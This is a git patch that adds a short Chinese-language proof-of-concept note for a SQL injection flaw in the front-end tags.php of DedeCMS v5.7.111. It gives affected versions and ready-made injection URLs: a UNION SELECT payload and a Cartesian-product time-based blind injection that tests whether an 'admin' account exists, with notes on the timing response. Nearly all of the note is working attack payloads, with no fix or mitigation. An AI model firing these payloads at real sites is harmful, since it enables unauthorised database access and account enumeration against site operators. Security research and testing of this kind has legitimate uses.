From cefe61bd30cf6df66307786b7aadbb27c1153600 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 8 Dec 2023 23:41:11 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Dedecms=20v5.7.111=E5=89=8D=E5=8F=B0ta?=
 =?UTF-8?q?gs.php=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Dedecms v5.7.111前台tags.php SQL注入漏洞.md | 24 +++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 Dedecms v5.7.111前台tags.php SQL注入漏洞.md

diff --git a/Dedecms v5.7.111前台tags.php SQL注入漏洞.md b/Dedecms v5.7.111前台tags.php SQL注入漏洞.md
new file mode 100644
index 0000000..eb179ea
--- /dev/null
+++ b/Dedecms v5.7.111前台tags.php SQL注入漏洞.md	
@@ -0,0 +1,24 @@
+
+## Dedecms v5.7.111前台tags.php SQL注入漏洞
+
+
+## 影响版本：
+```
+v5.7.111，或打补丁的历史版本
+```
+
+## poc
+```
+http://x.com/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1union%20select%201,2,3,4,5,6,7,8,9,10,11--%20\\
+
+/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/568076a5-4ad2-4cf6-89a4-60d02d464222)
+
+## 笛卡尔积 盲注
+```
+/tags.php?tag=a/alias/about%27and{`\%27`%20id}%3E0.1+or+if(exists(select+*+from+%23@__admin+where+userid+like'admin'),(select+count(*)+from+information_schema.tables+A,information_schema.tables+B),1)--%20\\
+```
+当 admin表userid 存在admin时，响应时间为下图右下角的 5539 ms
+![image](https://github.com/wy876/POC/assets/139549762/ac170e5f-a085-4dc6-affb-94ffb99f69d8)